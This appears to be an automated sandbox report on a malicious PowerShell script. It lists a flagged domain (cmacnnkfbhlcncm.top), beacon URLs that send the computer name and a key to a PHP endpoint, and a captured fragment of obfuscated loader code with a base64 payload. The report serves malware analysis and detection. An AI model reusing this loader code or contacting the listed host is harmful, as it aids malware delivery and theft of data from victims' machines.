Click to jump to signature section
Source: http://cmacnnkfbhlcncm.top | Avira URL Cloud: Label: malware |
Source: | Binary string: ion.pdbcyTk source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdb source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.41030903631.0000026E907A3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41066212714.0000026EAAD8F000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb} source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ws\System.Management.Automation.pdbQ source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbOypk source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: gement.Automation.pdbnSS% source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.41066212714.0000026EAAD8F000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.Management.Automation.pdbo source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbq source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbj source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 9.9.9.9 |
Source: global traffic | DNS traffic detected: DNS query: cmacnnkfbhlcncm.top |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93B0F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php? |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93B0F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php?id=$env:computername&key=$ijkcxgoqtupsma&s=527 |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93A8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41032039963.0000026E934F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93A8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41032039963.0000026E934F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/9ciszeq80lhtr.php?id=computer&key=15935922840&s=527 |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93A8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/9ciszeq80lhtr.php?id=computer&key=15935922840&s=527p |
Source: powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.41065685822.0000026EAAA40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr |
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92921000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz |
Source: powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92921000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz |
Source: powershell.exe, 00000000.00000002.41032039963.0000026E94AEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF8D1B28B32 | 0_2_00007FF8D1B28B32 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF8D1B27D86 | 0_2_00007FF8D1B27D86 |
Source: classification engine | Classification label: mal68.evad.winPS1@2/7@2/0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:304:WilStaging_02 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drm1igxw.dvr.ps1 | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $049h8rxnvqfbt27.(([system.String]::new(@((235505/(16643525/4735)),(238317/(5977248/2784)),(-9346+(1827+(7527+(-5188+5292)))),(-4857+(-770+(3789+(-4097+(11413-(734+(9380-(5285027/1111)))))))),(6501-(15043-(537+8089))),(-3722+3833)))))( $sgvhtey7i8axq3r ) $049h8rxnvqfbt27.(([system.String]::new(@((279926/4178),(56484/(2982-(2132+(-7110+(10569-(-4136+(1930+(-733+(10266061/(12158290/(3350540/(4170234/8949)))))))))))),(2320-(717925/325)),(9204-9089),(-9836+9937)))))()$0lu51qr8owa9zh37ywckn3xdhbuie.(([system.String]::new(@((6297-6230),(-8043+8151),(353646/(12145032/(11016-(10521-3317)))),(-212+327),(970610/(17833-8223))))))()[byte[]] $ioj8fg7y3huk5a6 = $sgvhtey7i8axq3r.(([system.String]::new(@((-8712+(9714-918)),(629481/5671),(-6254+6319),(4095-3981),(1024860/(-1084+10074)),(10114-10017),(847847/7007)))))() $uykm374xtfghd2z=$ioj8fg7y3huk5a6 return $uykm374xtfghd2z}[System.Text.Encoding]::ascii.((-join (@((216337/(4948328/1624)),(683265/(-976+(7321+420))),(4552-4436),(-855+(4385150/4675)),(760148/6553),(-6942+(373+6683)),(8509-8404),(766590/6969),(6417-(64364916/10194)))| ForEach-Object { [char]$_ })))((nvgh3e65mupyqljs8obki24acw1 "ffprNjRmdW93dp3kOf5+4UXj6iwzidm4Ap1QXwMdqkBR/jwIgE2mMNbhSWcxNmpbE1m9DyBPvJWcj24tfQMrX3BM02LgBZ43la/WnWLLIDqeuVYEBI7az/nF0pidSMKEp7qomfr5C5CViIv/7Z+/CksVC5Cmk/2rRYb8CI1aChwKjd6BNQYcTsackJKcaAaCnJpY8ctayjOMneHn/E8dwN6UiaqsWNcm3AsaQN+ePhjIA8SanPLYGYqeh6QMTSYb+kK0G7K0upELOoG1cMd3XdXBwNti4Vu0W7b15KIcaggPKEtgQxzGufApVsrGsfLHkJlOuRnpSZueL3shBHo6iX7TIYFDxYbKpC2wJH/ti6x7fUetWOZ/vAkEGFLH0zWDEHxe84R7BnHC8WbO/AKyY26nv3kR7BPT79LR7AAALhwZKvnnoYuT3/H1tnCN9gmE/TYVq80E3DSdM9MmG707uImxx/sTAWYTqseWbNduALxZRU8nJZooL42NqzUIvEuZNTylPVVbo7YqpCIb+TpsA+4D1qsVae6+AamBlOEQqECAXUWuMexaWthcrNWKIDTZp4SrZM/0F/ONtiCBFOvemYXxGahiHGb3S4elXP4QkV4CBBxJuRzbgZh1TghKDJUO+UXwIKUdmSSoSdTF58TU/OqYC5eApS+HE4adtcHJgnHtqYdEnglTqc2Uk5BtCAJDGRaqtXpMAjn3s68q5ChM4yoXVnHux1kRA+faKz/B4yWqPO1h2VLWAi+g4BRfKiwUvQQDG9jXsfvhKy8L7jTkBrcoULovoC4L0MrHpwVam8kUh7jqxaxR1GGeAI7k2p6OxjQHWo56LnUP/I/f7NIOFaMfA5WAsdvMXcs1cB7V7RyX8HUjlzoZe0mjiy7kkSigp7GfzPmqKIl9rttAWS9TdUMB3JeYJFPvrfx9Dv4LgV5maIH2SjIvTzzIPBuTks7NUFIIEzCd3cYdG76FagqiGXIzqaHpnQLzwJNAcUOQrOLk2RdWjU5b6IgahIWPmv+3DI2wudvlvA5OCUbAm4S+cRupClWPDsuag8aU6UiVgZaW3V9Xfa4+2Chm+PZDLXBJlbfxZFQtbUWZcuLsVcOefhAKm+sUwTePPO28y8KQlMiYaJ+9PoJXKiwN+Lt7iJ7bz29aLlZHM90RGgGyxertLEMq1I0Ooxbgx6uM4ZZ+Wvo2IDiU8Seme81kS13xV3i6wUmX4EyKQ4yDUe8q9Dezq6k7xu5ncRhBkF1nXv4k5MvMBBKewA |